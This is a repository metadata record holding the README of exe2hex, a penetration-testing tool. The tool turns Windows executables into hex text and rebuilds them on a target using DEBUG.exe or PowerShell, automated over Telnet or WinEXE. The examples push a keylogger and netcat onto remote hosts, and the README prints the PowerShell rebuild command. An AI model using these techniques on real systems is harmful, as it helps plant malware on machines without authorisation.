{"id":13681258,"url":"https://github.com/g0tmi1k/exe2hex","last_synced_at":"2025-04-06T20:13:10.048Z","repository":{"id":50605399,"uuid":"46336369","full_name":"g0tmi1k/exe2hex","owner":"g0tmi1k","description":"Inline file transfer using in-built Windows tools (DEBUG.exe or PowerShell).","archived":false,"fork":false,"pushed_at":"2020-04-27T10:17:14.000Z","size":53,"stargazers_count":312,"open_issues_count":1,"forks_count":98,"subscribers_count":19,"default_branch":"master","last_synced_at":"2025-03-30T19:07:02.618Z","etag":null,"topics":["debug","file-transfer","hex","hexe","inline","kali","kali-linux","powershell","telnet","winexe"],"latest_commit_sha":null,"homepage":"https://blog.g0tmi1k.com/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/g0tmi1k.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2015-11-17T09:23:19.000Z","updated_at":"2025-03-19T11:40:27.000Z","dependencies_parsed_at":"2022-09-24T15:13:26.848Z","dependency_job_id":null,"html_url":"https://github.com/g0tmi1k/exe2hex","commit_stats":null,"previous_names":[],"tags_count":7,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/g0tmi1k%2Fexe2hex","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/g0tmi1k%2Fexe2hex/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/g0tmi1k%2Fexe2hex/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/g0tmi1k%2Fexe2hex/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/g0tmi1k","download_url":"https://codeload.github.com/g0tmi1k/exe2hex/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247543594,"owners_count":20955865,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["debug","file-transfer","hex","hexe","inline","kali","kali-linux","powershell","telnet","winexe"],"created_at":"2024-08-02T13:01:28.457Z","updated_at":"2025-04-06T20:13:10.020Z","avatar_url":"https://github.com/g0tmi1k.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# exe2hex\n\nInline file transfer using in-built Windows tools (`DEBUG.exe` or PowerShell).\n\n\u003cp align=\"center\"\u003e\n  \u003cimg src=\"http://i.imgur.com/n6Op45O.png\" alt=\"exe2hex logo\"/\u003e\n\u003c/p\u003e\n\n- - -\n\n### Overview\n\nexe2hex encodes an executable binary file into ASCII text format.\n\nThe result then can be transferred to the target machine (It is much easier to echo a ASCII file than binary data).\n\nUpon executing exe2hex's output file, the original program is restored by using `DEBUG.exe` or PowerShell (which are pre-installed by default on Windows).\n\nCan be automated by using either the in-built Telnet or WinEXE options in exe2hex to transfer the file over to the target machine, else the output can manually be inserted.\n\n```Binary EXE -\u003e ASCII Text -\u003e *Transfer* -\u003e Binary EXE```\n\n![](https://i.imgur.com/vAmiyj9.png)\n\n- - -\n\n### Quick Guide\n\n + Input using a file (`-x /path/to/binary-program.exe`) or STDIN (`-s`)\n + Output to BATch (`-b file.bat`) and/or PoSH (`-p powershell.cmd`)\n\n#### Example Usage\n\n**Create BATch \u0026 PowerShell files**:\n```bash\n$ python3 exe2hex.py -x /usr/share/windows-binaries/sbd.exe\n[*] exe2hex v1.5\n[i] Outputting to /root/sbd.bat (BATch) and /root/sbd.cmd (PoSh)\n[+] Successfully wrote (BATch) /root/sbd.bat\n[+] Successfully wrote (PoSh) /root/sbd.cmd\n$\n```\n\n**Compress the file before creating a BATch file**:\n```bash\n$ ./exe2hex.py -x /usr/share/windows-binaries/nc.exe -b /var/www/html/nc.txt -cc\n[*] exe2hex v1.5\n[i] Attempting to clone and compress\n[i] Creating temporary file /tmp/tmpft9tmm_i\n[+] Compression (strip) was successful! (0.0% saved)\n[+] Compression (UPX) was successful! (50.9% saved)\n[+] Successfully wrote (BATch) /var/www/html/nc.txt\n$\n```\n\n**Use STDIN to create BATch \u0026 PowerShell files**:\n```bash\n$ cat /usr/share/windows-binaries/whoami.exe | python3 exe2hex.py -s -b debug.bat -p ps.cmd\n[*] exe2hex v1.5\n[i] Reading from STDIN\n[+] Successfully wrote (BATch) /root/debug.bat\n[+] Successfully wrote (PoSh) /root/ps.cmd\n$\n```\n\n#### Help\n\n```bash\n$ python3 exe2hex.py\n[*] exe2hex v1.5\n\nEncodes an executable binary file into ASCII text format\nRestore using DEBUG.exe (BATch - x86) or PowerShell (PoSh - x86/x64)\n\nQuick Guide:\n + Input binary file with -s or -x\n + Output with -b and/or -p\nExample:\n $ /usr/bin/exe2hex -x /usr/share/windows-binaries/sbd.exe\n $ /usr/bin/exe2hex -x /usr/share/windows-binaries/nc.exe -b /var/www/html/nc.txt -cc\n $ cat /usr/share/windows-binaries/whoami.exe | /usr/bin/exe2hex -s -b debug.bat -p ps.cmd\n\n--- --- --- --- --- --- --- --- --- --- --- --- --- --- ---\n\nUsage: exe2hex [options]\n\nOptions:\n  -h, --help  show this help message and exit\n  -x EXE      The EXE binary file to convert\n  -s          Read from STDIN\n  -b BAT      BAT output file (DEBUG.exe method - x86)\n  -p POSH     PoSh output file (PowerShell method - x86/x64)\n  -e          URL encode the output\n  -r TEXT     pRefix - text to add before the command on each line\n  -f TEXT     suFfix - text to add after the command on each line\n  -l INT      Maximum HEX values per line\n  -c          Clones and compress the file before converting (-cc for higher\n              compression)\n  -t          Create a Expect file, to automate to a Telnet session.\n  -w          Create a Expect file, to automate to a WinEXE session.\n  -v          Enable verbose mode\n$\n```\n\n- - -\n\n### Methods/OS Support\n\n+ **`DEBUG.exe` (BATch mode - `-b`)**\n  + Supports x86 OSs (No x64 support).\n  + Useful for legacy versions of Windows (e.g. Windows XP/Windows 2000).\n    + Pre-installed by default. Works out of the box.\n  + ~~Limitation of 64k file size for binary programs.~~ Creates multiple parts and joins with `copy /b` so this is not an issue anymore!\n+ **PowerShell (PoSh mode - `-p`)**\n  + Supports both x86 \u0026 x64 OSs.\n  + Aimed at more \"recent\" versions of Windows.\n    + PowerShell was first integrated into core OS with Windows 7/Windows Server 2008 R2.\n    + Windows XP SP2, Windows Server 2003 \u0026 Windows Vista requires PowerShell to be pre-installed.\n  + This is **not** a `.ps1` file (pure PowerShell). It only calls PowerShell at the end.\n\n- - -\n\n### Features\n\n**Primary purpose**: Convert a binary program into a ASCII HEX file which can be restored using in-built OS programs.\n\n+ Work on old and new versions of Windows without requiring any 3rd party programs to be pre-installed.\n+ Supports x86 \u0026 x64 OSs.\n+ Can use DEBUG.exe or PowerShell to restore the file.\n+ Able to compress the file before converting.\n+ URL encode the output.\n+ The option to add prefix and suffix text to each line.\n+ Able to set a maximum HEX length per line.\n+ Can use a binary file or pipe from standard input (`STDIN`).\n+ Automate transfers over Telnet and/or WinEXE.\n\n\nNote: This is nothing new. [The core idea (using DEBUG.exe for inline file transfer) has been around since 2003](https://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-chong.pdf) _(if not earlier!)_.\n\n- - -\n\n### Telnet\n\nWhen pasting a large amount of data (100+ lines) directly into a Telnet session, the results can be \"unpredictable\". Behaviours include lines being executed in a incorrect order or characters are just completely skipped.\n\nA solution is to use \"[Expect](http://expect.sourceforge.net/)\" (which is an extension of [TCL](https://sourceforge.net/projects/tcl/)). Expect can be found in a most major Linux OSs repositories (`apt-get -y install expect` / `yum -y install expect` / `pacman -S expect`). Upon executing exe2hex's Telnet script, Expect will automate the Telnet login (based on the arguments used), look for a writeable folder (e.g. defaults to the system variable, `%TEMP%`) and then start inputting commands from exe2hex's output file, line by line one at a time. If required, the variables at the top of the Expect script can be manually edited (to use a different Telnet port, path, or command prompt).\n\nAn example of exe2hex's Telnet mode can be seen below:\n\n```bash\n$ python3 exe2hex.py -x /usr/share/windows-binaries/klogger.exe -b klogger.bat -t\n[*] exe2hex v1.5\n[+] Successfully wrote (BATch) /root/klogger.bat\n[+] Successfully wrote (Expect) /root/klogger-bat-telnet\n$\n$ expect /root/klogger-bat-telnet\nUsage: ./klogger-bat-telnet \u003cip\u003e \u003cusername\u003e \u003cpassword\u003e\n$\n$ /root/klogger-bat-telnet 192.168.103.148 winxp pass123\n\nspawn telnet 192.168.103.148\n\nTrying 192.168.103.148...\nConnected to 192.168.103.148.\nEscape character is '^]'.\nWelcome to Microsoft Telnet Service\n\nlogin: winxp\npassword:\n\n*===============================================================\nWelcome to Microsoft Telnet Server.\n*===============================================================\nC:\\Documents and Settings\\winxp\u003ecd %TEMP%\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eecho 418671.0\u003eklogger.bat\n418671.0E~1\\winxp\\LOCALS~1\\Temp\u003etype klogger.bat\n\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e\n\n[i] Writeable folder!\n\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003edel /F klogger.bat\nRuns Debug, a program testing and editing tool.\n\nDEBUG [[drive:][path]filename [testfile-parameters]]\n\n  [drive:][path]filename  Specifies the file you want to test.\n  testfile-parameters     Specifies command-line information required by\n                          the file you want to test.\n\nAfter Debug starts, type ? to display a list of debugging commands.\n\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e   (Progress: 1/382)\nif NOT %ERRORLEVEL% == 0 echo \u0026echo \u0026echo \u0026echo **** **** **** **** ****\u0026echo *** Missing DEBUG.exe ***\u0026echo **** **** **** **** ****\u0026exit /b\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e   (Progress: 2/382)\necho n klogger.0\u003eklogger.hex\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e   (Progress: 3/382)\necho e 0100\u003e\u003eklogger.hex\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e   (Progress: 4/382)\necho 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00\u003e\u003eklogger.hex\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e   (Progress: 5/382)\necho e 0180\u003e\u003eklogger.hex\n\n\n...SNIP...\n\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e   (Progress: 376/382)\nmove /Y klogger.0 klogger.exe\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e   (Progress: 377/382)\necho. \u003eklogger.hex\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e   (Progress: 378/382)\ndel /F /Q klogger.hex klogger.0\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e   (Progress: 379/382)\n Volume in drive C has no label.\n Volume Serial Number is 002C-A3B2\n\n Directory of C:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\n\n06/09/2017  10:19 AM            23,552 klogger.exe\n               1 File(s)         23,552 bytes\n               0 Dir(s)  40,501,571,584 bytes free\n\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003eC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e   (Progress: 380/382)\n\n\n[i] Done\n\nC:\\DOCUME~1\\winxp\\LOCALS~1\\Temp\u003e\n```\n\n\n### WinEXE\n\nLike the Telnet mode (`-t`), exe2hex can automate using winexe to transfer files across, inline, using expect:\n\n```bash\n$ python3 exe2hex.py -x /usr/share/windows-binaries/mbenum/mbenum.exe -p mbenum.cmd -w\n[*] exe2hex v1.5\n[+] Successfully wrote (PoSh) /root/mbenum.cmd\n[+] Successfully wrote (Expect) /root/mbenum-posh-winexe\n$\n$ expect /root/mbenum-posh-winexe\nUsage: ./mbenum-posh-winexe \u003cip\u003e \u003cusername\u003e \u003cpassword\u003e\n$\n$ ./mbenum-posh-winexe 192.168.103.147 win7 123456789\n\nspawn winexe -U win7%123456789 //192.168.103.147 cmd.exe\n\nMicrosoft Windows [Version 6.1.7601]\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\n\nC:\\Windows\\system32\u003ecd %TEMP%\ncd %TEMP%\n\nC:\\Windows\\Temp\u003eecho 656082.0\u003embenum.cmd\necho 656082.0\u003embenum.cmd\n\nC:\\Windows\\Temp\u003etype mbenum.cmd\ntype mbenum.cmd\n656082.0\n\n[i] Writeable folder!\n\n\nC:\\Windows\\Temp\u003edel /F mbenum.cmd\ndel /F mbenum.cmd\n\nC:\\Windows\\Temp\u003eecho|set /p=\"\"\u003embenum.hex\n\necho|set /p=\"\"\u003embenum.hex\n\nC:\\Windows\\Temp\u003e   (Progress: 1/388)\n\nC:\\Windows\\Temp\u003eecho|set /p=\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000\"\u003e\u003embenum.hex\n\necho|set /p=\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000\"\u003e\u003embenum.hex\n\nC:\\Windows\\Temp\u003e   (Progress: 2/388)\n\nC:\\Windows\\Temp\u003eecho|set /p=\"fa28c48dbe49aadebe49aadebe49aadec555a6debf49aaded156a1debf49aade3d55a4deae49aaded156a0de8b49aade3d41f7debb49aadebe49abde9049aadeb86aa0debc49aade52696368be49aade000000000000000000000000000000000000000000000000504500004c01030001ea7f3f0000000000000000e0000f01\"\u003e\u003embenum.hex\n\n...SNIP...\n\nC:\\Windows\\Temp\u003e   (Progress: 385/388)\n\nC:\\Windows\\Temp\u003epowershell -Command \"$h=Get-Content -readcount 0 -path './mbenum.hex';$l=$h[0].length;$b=New-Object byte[] ($l/2);$x=0;for ($i=0;$i -le $l-1;$i+=2){$b[$x]=[byte]::Parse($h[0].Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);$x+=1};set-content -encoding byte 'mbenum.exe' -value $b;Remove-Item -force mbenum.hex;Get-ChildItem mbenum.exe;\"\n\npowershell -Command \"$h=Get-Content -readcount 0 -path './mbenum.hex';$l=$h[0].length;$b=New-Object byte[] ($l/2);$x=0;for ($i=0;$i -le $l-1;$i+=2){$b[$x]=[byte]::Parse($h[0].Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);$x+=1};set-content -encoding byte 'mbenum.exe' -value $b;Remove-Item -force mbenum.hex;Get-ChildItem mbenum.exe;\"\n\n\n   (Progress: 386/388)ows\\Temp\n\n\n[i] Done\n\n\n\nMode                LastWriteTime     Length Name\n----                -------------     ------ ----\n-a---        09/06/2017     10:21      49152 mbenum.exe\n\n\n\n\nC:\\Windows\\Temp\u003e\n```\n\n_NOTE: May need to press enter to get a prompt back at the end._\n\n- - -\n\n## Install\n\nJust exe2hex just requires [Python 3](https://www.python.org/) to function ([Expect](http://expect.sourceforge.net/) is optional for Telnet and WinEXE functions).\n\nSimply add exe2hex a folder in your `$PATH` variable:\n\n```bash\n$ echo $PATH\n/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n$ curl -k -L \"https://raw.githubusercontent.com/g0tmi1k/exe2hex/master/exe2hex.py\" \u003e /usr/local/bin/exe2hex\n$ chmod 0755 /usr/local/bin/exe2hex\n```\n\n### Kali-Linux\n\nexe2hex is already [packaged](https://pkg.kali.org/pkg/exe2hexbat) in [Kali Rolling](https://www.kali.org/), so all you have to-do is:\n\n```bash\nroot@kali:~# apt install -y exe2hexbat\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fg0tmi1k%2Fexe2hex","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fg0tmi1k%2Fexe2hex","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fg0tmi1k%2Fexe2hex/lists"}